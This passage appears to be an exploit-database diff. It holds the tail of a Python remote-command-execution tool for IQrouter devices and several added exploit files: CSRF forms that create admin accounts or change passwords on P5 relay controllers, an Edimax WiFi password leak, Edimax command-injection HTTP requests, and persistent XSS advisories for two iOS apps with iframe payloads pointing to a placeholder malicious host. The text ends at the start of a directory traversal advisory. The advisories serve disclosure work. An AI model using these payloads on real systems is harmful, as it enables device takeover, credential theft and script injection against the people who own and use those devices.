print("{} - {}".format(num, payload[1]))
num += 1
print(
'############### RCE (router need to be in setup mode) ###############')
for payload in rce_setup:
print("{} - {}".format(num, payload[1]))
num += 1
print(
'######################### Advanced payloads #########################')
for payload in advanced_payloads:
print("{} - {}".format(num, payload[1]))
num += 1
parser = argparse.ArgumentParser(description="IQrouter multiple RCE")
parser.add_argument('--host', help='Host', type=str)
parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)
parser.add_argument('-n', '--num', help='Payload number',
default=0, type=int)
parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',
default="pwd", type=str)
parser.add_argument('--protocol', help='Protocol (http/https)',
default="http", type=str)
args = parser.parse_args()
def main():
print("")
full_payload_list = rce_setup + rce_any + advanced_payloads
payloads_amount = len(full_payload_list)
try:
hostname = args.host
port = args.port
payload_num = int(args.num)
bash_cmd = args.cmd
protocol = args.protocol
if payload_num < 1 or payload_num > payloads_amount:
print("Error with payload number!")
raise IndexError
if port < 0 or port > 65535:
print("Error with port number")
raise IndexError
if protocol not in ['http', 'https']:
print("Error with protocol name")
raise IndexError
current_payload = full_payload_list[payload_num - 1]
print("Payload: {}".format(current_payload[1]))
print("Host: {}".format(hostname))
print("Port: {}".format(port))
print("Protocol: {}".format(protocol))
print("Command: {}".format(bash_cmd))
full_url = "{}://{}:{}{}".format(protocol, hostname, port,
current_payload[0].format(bash_cmd))
print("Built URL: {}".format(full_url))
r = requests.get(full_url)
print("Status code: {}".format(r.status_code))
return
except IndexError:
parser.print_help()
print_payloads()
exit(1)
if __name__ == '__main__':
print(
"\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.")
exit(main())

90
exploits/hardware/webapps/48362.txt Normal file
View file

@ -0,0 +1,90 @@
# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)
# Google Dork:jizhicms
# Date: 2020-04-18
# Exploit Author: iej1ctk1g
# Product web page: https://www.p5.hu
# Affected version: 1.0.20, 1.0.11
# CVE : N/A
<!--
P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting
Vendor: P5
Product web page: https://www.p5.hu
Affected version: 1.0.20, 1.0.11
Summary: The FNIP-8x16A is an eight channel relay module used for switching any
type of load that doesnt exceed the specifications. Via its built-in web site
and TCP/IP communication, the outputs and inputs can be controlled and monitored
from standard network capable devices such as computers, smartphones, web-tablets,
etc. either locally or via the network. The module can be used independently or
as part of a complex control system in residential and commercial installations.
Desc: The controller suffers from CSRF and XSS vulnerabilities. The application
allows users to perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits a malicious web
site. Input passed to several GET/POST parameters is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in context of an affected site.
Tested on: Linux
CGI
Vulnerabiity discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5564
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php
29.01.2020
-->
<!-- CSRF add admin user -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="uno" value="1" /> <!-- User number (user1) -->
<input type="hidden" name="un" value="testingus" /> <!-- Username -->
<input type="hidden" name="role" value="2" /> <!-- 2: Admin, 1: Actor, 0: Observer -->
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>
<!-- CSRF change admin password -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow -->
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>
<!-- XSS modify labels -->
<html>
<body>
<form action="http://192.168.1.17:83/config.html" method="POST">
<input type="hidden" name="lab1" value="Channel1" />
<input type="hidden" name="lab2" value="Channel2" />
<input type="hidden" name="lab3" value="Channel3" />
<input type="hidden" name="lab4" value='"><script>confirm(251)</script>' />
<input type="hidden" name="lab12" value="etc." />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>

94
exploits/hardware/webapps/48365.txt Normal file
View file

@ -0,0 +1,94 @@
# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password)
# Date: 2020-04-21
# Exploit Author: Besim ALTINOK
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Version:1.13
# Tested on: Edimax EW-7438RPn 1.13 Version
-----------------------------
Here step by step :
1. I did Setup
2. After setup try to access to *wlencrypt_wiz.asp* file
3. After access to this file, I saw some information disclosure
(Like *WiFi Password*)
4. Here is the all leak here:
-------------------------------
<SCRIPT>
var _DATE_="Mon Sep 24 19:38:17 CST 2012";
var _VERSION_="1.13";
var _MODEL_="EW7438RPN";
var _MODE_="Edimax";
var _PLATFORM_="RTL8196CS_1200";
var _HW_LED_WPS_="4";
var _HW_LED_POWER_="6";
var _HW_LED_WIRELESS_="2";
var _HW_BUTTON_RESET_="5";
var _HW_BUTTON_WPS_="1";
var _HW_BUTTON_SWITCH_="3";
var _HW_LED_USB_="17";
var _WIRELESS_IGMPSNOOP_="y";
var _SPECIAL_CHAR_FILTER_IN_SCRIPT_="y";
var _RDISC_="y";
var _WPS_NO_BROADCAST_="y";
var _UPNP_LIB_VERSION2_="y";
var _WDS_UR_INFO_="y";
var _RESERVE_ENCRYPTION_SETTING_="y";
var _IGMP_PROXY_="y";
var _IGMPSNOOP_="y";
var _RFTYPE_="2T2R";
var _MEMBUS_="16";
var _MEMSIZE_="16";
var _MEMTYPE_="SDRAM";
var _FLASHTYPE_="SPI";
var _REMOVE_RADIUS_SERVER_="y";
var _AUTO_CHANNEL_DET_="y";
var _CONTROL_SIDEBAND_="y";
var _WIFI_11N_STANDARD_="y";
var _SETTING_WIZARD_="y";
var _CONFIG_FILE_NAME_="7438RPN";
var _AP_WITH_DNS_="y";
var _USE_DNRD_="y";
var _WPS_MIX_="y";
var _POWER_SAVING_="y";
var _WEB_FILE_NAME_="7438RPN";
var _PINCODE_BY_MAC_="y";
var _UPNP_RESPONDER_="y";
var _MDNS_RESPONDER_="y";
var _NETBIOS_RESPONDER_="y";
var _AP_WITH_DHCP_CLIENT_="y";
var _LLTD_NODENAME_="y";
var _DHCP_SWITCH_="y";
var _CONNECT_TEST_="y";
var _START_BOA_="y";
var _WPS_Daemon_="y";
var security = 1;
apMode = 6;
methodVal = 2;
opMode = 0;
apMachType = 1;
var ssidTbl = new Array("PentesterTraining");
var mirrorTbl = "";
var secModeTbl = new Array("2");
var enable1XTbl = new Array("0");
var _1xMode = "0";
var wepTbl = new Array("0");
var keyTypeTbl = new Array("1");
var wpaCipherTbl = new Array("2");
var pskFormatTbl = new Array("0");
var pskValueTbl = new Array("wifipass123.");
var defaultKeyIdTbl=new Array("0");
var rsIp= "";
var rsPort= "1812";
var rsPassword= "";
--
Besim ALTINOK
*Security Engineer*

32
exploits/hardware/webapps/48366.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)
# Date: 2020-04-21
# Exploit Author: Besim ALTINOK
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Version:1.13
# Tested on: Edimax EW-7438RPn 1.13 Version
CSRF PoC - Mac Filtering
----------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://172.20.10.2/goform/formWlAc" method="POST">
<input type="hidden" name="wlanAcEnabled" value="ON" />
<input type="hidden" name="tiny&#95;idx" value="0" />
<input type="hidden" name="mac" value="ccbbbbbbbbbb" />
<input type="hidden" name="comment" value="PentesterTraining" />
<input type="hidden" name="addFilterMac" value="Add" />
<input type="hidden" name="submit&#45;url"
value="&#47;macfilter1&#95;sub1&#46;asp" />
<input type="hidden" name="wlanSSIDIndex" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
--
Besim ALTINOK
*Security Engineer*

75
exploits/hardware/webapps/48377.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution
# Date: 2020-04-23
# Exploit Author: Besim ALTINOK
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Version:1.13
# Tested on: Edimax EW-7438RPn 1.13 Version
------
NOTE: This device configurated with root permissions. So you can run the
command as root
Here is the detail(s) of the RCE(s)
1- Content of the mp.asp file
<form action="/goform/mp" method="POST" name="mp">
<input type="text" name="command" value="">&nbsp;<input
type="submit" value="GO">
<input type="hidden" name="getID" value="">&nbsp;
<input type="hidden" name="getID" value="">&nbsp;
</form>
RCE Detail:
-------------------------------
POST /goform/mp HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 *********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
DNT: 1
Authorization: Basic YWRtaW46MTIzNA==
Connection: close
Cookie: language=1
Upgrade-Insecure-Requests: 1
command=||busybox+ls&getID=
-------------------------------
2- Content of the syscmd.asp
<form action=/goform/formSysCmd method=POST name="formSysCmd"><table
border=0 width="500" cellspacing=0 cellpadding=0>
<tr><font size=2>
This page can be used to run target system command.</tr>
<tr><hr size=1 noshade align=top></tr>
<tr> <td>System Command: </td>
<td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td>
<td> <input type="submit" value="Apply" name="apply" onClick='return
saveClick()'></td></form>
RCE Detail:
-------------------------------
POST /goform/formSysCmd HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 *********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
DNT: 1
Authorization: Basic YWRtaW46MTIzNA==
Connection: close
Cookie: language=1
Upgrade-Insecure-Requests: 1
sysCmd="command to here"

417
exploits/ios/webapps/48321.txt Normal file
View file

@ -0,0 +1,417 @@
# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://www.app2pro.com
# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421
# CVE: N/A
Document Title:
===============
AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2203
Release Date:
=============
2020-04-15
Vulnerability Laboratory ID (VL-ID):
====================================
2203
Common Vulnerability Scoring System:
====================================
4.5
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
File sharing with other iOS devices via Bluetooth or Wi-Fi connection
with automatic search of nearest devices.
Users can perform file operations on the application like: Copy, Move,
Zip, Unzip, Rename, Delete, Email, and more.
Easy to create file like: Text File, New folder, Playlist, Take
Photo/Video, Import From Library, and Voice Record.
AirDisk Pro allows you to store, view and manage files on your iPhone,
iPad or iPod touch. You can connect to AirDisk
Pro from any Mac or PC over the Wi-Fi network and transfer files by drag
& drop files straight from the Finder or Windows
Explorer. AirDisk Pro features document viewer, PDF reader, music
player, image viewer, voice recorder, text editor, file
manager and support most of the file operations: like delete, move,
copy, email, share, zip, unzip and more.
(Copy of the Homepage:
https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 )
(Copy of the Homepage: http://www.app2pro.com )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile
application.
Affected Product(s):
====================
Felix Yew
Product: AirDisk Pro v5.5.3 (iOS)
Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
No authentication (guest)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerability has been
discovered in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.
The first vulnerability is located in the `createFolder` parameter of
the `Create Folder` function. Attackers are able to name
or rename paths via airdisk pro ui to malicious persistent script codes.
Thus allows to execute the persistent injected script
code on the front site of the path index listing in the content itself
on each refresh. The request method to inject is POST
and the attack vector is located on the application-side. Interaction to
exploit is as well possible through the unauthenticated
started ftp service on the local network.
The second vulnerability is located in the `deleteFile` parameter of the
`Delete` function. The output location with the popup
that asks for permission to delete, allows to execute the script code.
The injection point is the file parameter and the execution
point occurs in the visible delete popup with the permission question.
The request method to inject is POST and the attack vector
is located on the application-side.
The third web vulnerability is located in the `devicename` parameter
that is displayed on the top next to the airdisk pro ui logo.
Remote attackers are able to inject own malicious persistent script code
by manipulation of the local apple devicename information.
The injection point is the devicename information and the execution
point occurs in the file sharing ui panel of the airdisk pro
mobile web-application.
Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious source and
persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] AirDisk pro Wifi UI
Vulnerable Parameter(s):
[+] createFolder
[+] deleteFile
[+] devicename
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with wifi access with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
1. Create Folder
PoC: Vulnerable Source
<tbody>
<form name="checkbox_form"></form>
<tr><td class="e"><input type="checkbox" name="selection"
value="test"></td><td class="i"><a href="test/"><img
src="/webroot/fileicons/folder.png"
width="20" height="20"></a></td><td class="n"><a
href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td
class="s"></td><td class="k">Folder</td>
<td class="e"><span style="height:15px;
width:15px;">&nbsp;</span></td><td class="e"><a href="#" title="Rename
file" onclick="modalPopup("test", 0, 0);">
<img src="/webroot/webrename.png" width="15" height="15"></a></td><td
class="e"><a href="#" title="Delete file"
onclick="modalPopup("test", 2, 0);">
<img src="/webroot/webdelete.png" width="15"
height="15"></a></td></tr><tr class="c"><td class="e"><input
type="checkbox" name="selection"
value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a
href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">
<img src="/webroot/fileicons/folder.png" width="20"
height="20"></a></td><td class="n">
<a href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe
src="evil.source"></a></td>
<td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td
class="k">Folder</td><td class="e"><span style="height:15px;
width:15px;">&nbsp;</span></td><td class="e">
<a href="#" title="Rename file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS
INJECTED SCRIPT CODE!];, 0, 1);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e">
<a href="#" title="Delete file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS
INJECTED SCRIPT CODE!];, 2, 1);">
<img src="/webroot/webdelete.png" width="15"
height="15"/></a></td></tr><tr><td class="e"><input type="checkbox"
name="selection" value="Help.webarchive" /></td>
<td class="i"><a href="Help.webarchive"><img
src="/webroot/fileicons/webarchive.png" width="20"
height="20"></a></td><td class="n">
<a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec
2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web
Archive</td>
<td class="e"><a href="#" title="Download file"
onClick="downloadFile("Help.webarchive");"><img
src="/webroot/webdownload.png"
width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename
file" onClick="modalPopup("Help.webarchive", 0, 2);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e"><a href="#" title="Delete file"
onClick="modalPopup("Help.webarchive", 2, 2);"><img
src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr>
</form>
</tbody>
</table>
</div>
--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/
Upgrade-Insecure-Requests: 1
createFolder=test>"<[MALICIOUS INJECTED SCRIPT
CODE!]>&ID=0&submitButton=Create
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 6257
Note: Adding via ftp on mkdir or file is as well possible without
authentication on default setup.
2. Delete / Old Popup
PoC: Vulnerable Source
<div id="modal-content" class="simplemodal-data" style="display: block;">
<div id="modal-title"><h3>Delete File</h3></div>
<div id="modal-text"><a>Are you sure you want to delete this
file?"test"</a></div>
<form name="input" action="" method="post">
<div id="modal-field"><input type="hidden" name="deleteFile"
value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT
CODE]"></div>
<input type="hidden" name="ID" id="ID" value="test">
<input type="submit" name="submitButton" id="submitButton" value="Delete">
</form>
</div>
--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
deleteFile=New Folder&ID=New Folder&submitButton=Delete
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4699
Note: Comes up when somebody tries to delete the malicious injected path.
3. Devicename
PoC: Vulnerable Source
<div id="headerWraper">
<table border="0" cellspacing="0" cellpadding="0" width="100%">
<tr>
<td><a href="./"><img src="/webroot/webicon.png" id="headerImg"
width="57" height="57"/></a></td>
<td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td>
</tr>
</table>
</div>
--- PoC Session logs [GET] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4612
Note: Executes each time the wifi sharing ui service of airdisk pro is
opened by the local or remote users.
Solution - Fix & Patch:
=======================
1. Disallow special chars in the folder and filenames. Sanitize all
inputs and filter all involved parameters to prevent application-side
attacks.
2. Parse the output location of the popup permission message content to
prevent further executions after injects via post method.
3. Sanitize the devicename displayed on top of the wifi user interaction
by a secure parsing mechanism.
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the application functions are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM

306
exploits/ios/webapps/48322.txt Normal file
View file

@ -0,0 +1,306 @@
# Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://dropouts.in/
# Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097
# CVE: N/A
Document Title:
===============
SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2202
Release Date:
=============
2020-04-15
Vulnerability Laboratory ID (VL-ID):
====================================
2202
Common Vulnerability Scoring System:
====================================
4.6
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Backup all your iPhone or iPad contacts in 1 tap and export them.
Fastest way to restore contacts from PC or Mac.
Export by mailing the backed up contacts file to yourself. Export
contacts file to any other app on your device.
Export all contacts directly to your PC / Mac over Wifi, no software
needed! Restore any contacts directly from
PC / Mac. Restore contacts via mail. Get the ultimate contacts backup
app now.
(Copy of the Homepage:
https://apps.apple.com/us/app/super-backup-export-import/id1052684097 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site web vulnerabilities in the official SuperBackup
v2.0.5 ios mobile application.
Affected Product(s):
====================
Dropouts Technologies LLP
Product: Super Backup v2.0.5
Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered
in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.
The cross site scripting web vulnerabilities are located in the
`newPath`, `oldPath` & `filename` parameters of the vcf listing module.
Remote attackers are able to inject own malicious persistent script
codes as vcf filename to the main index list. The request method to
inject is POST and the attack vector of the vulnerability is located on
the application-side. The injection point is located at the vcf
filename or import. The execution point occurs in the main index list
after the import or insert.
Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious source and
persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] VCF
Vulnerable Parameter(s):
[+] newPath (path - vcf filename)
[+] oldPath (path - vcf filename)
Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote
attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the cross site scripting
vulnerability follow the provided information and steps below to continue.
PoC: Payload (Filename)
>"<iframe%20src=evil.source%20onload=alert("PWND")></iframe>
PoC: Vulnerable Source (Listing - Index)
<button type="button" class="btn btn-default btn-xs button-download">
<span class="glyphicon glyphicon-download-alt"></span>
</button>
</td>
<td class="column-name"><p class="edit" title="Click to
rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td>
<td class="column-size">
<p>26.40 KB</p>
</td>
<td class="column-delete">
<button type="button" class="btn btn-danger btn-xs button-delete">
<span class="glyphicon glyphicon-trash"></span>
</button>
</td>
</tr></tbody></table>
</div>
PoC: Exception-Handling
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe>
09:17:12:PM 10:Apr.:2020 .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source
onload=alert("PWND")></iframe> .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source
onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf"
PoC: Exploit
BEGIN:VCARD
VERSION:3.0
PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN
B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;;
END:VCARD
--- PoC Session Logs [POST] ---
http://localhost/move
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 187
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
oldPath=/Contacts 09:17:12:PM 10:Apr.:2020
.vcf&newPath=/evil-filename>"<iframe src=evil.source
onload=alert("PWND")></iframe>.vc
-
POST: HTTP/1.1 500 Internal Server Error
Content-Length: 593
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close
Solution - Fix & Patch:
=======================
1. Parse and filter the vcf name values next to add, edit or imports to
prevent an execution
2. Restrict and filter in the index listing the vcf names to sanitize
the output
Security Risk:
==============
The security risk of the persistent vcf cross site scripting web
vulnerability is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM

245
exploits/ios/webapps/48327.txt Normal file
View file

@ -0,0 +1,245 @@
# Title: File Transfer iFamily 2.1 - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A
Document Title:
===============
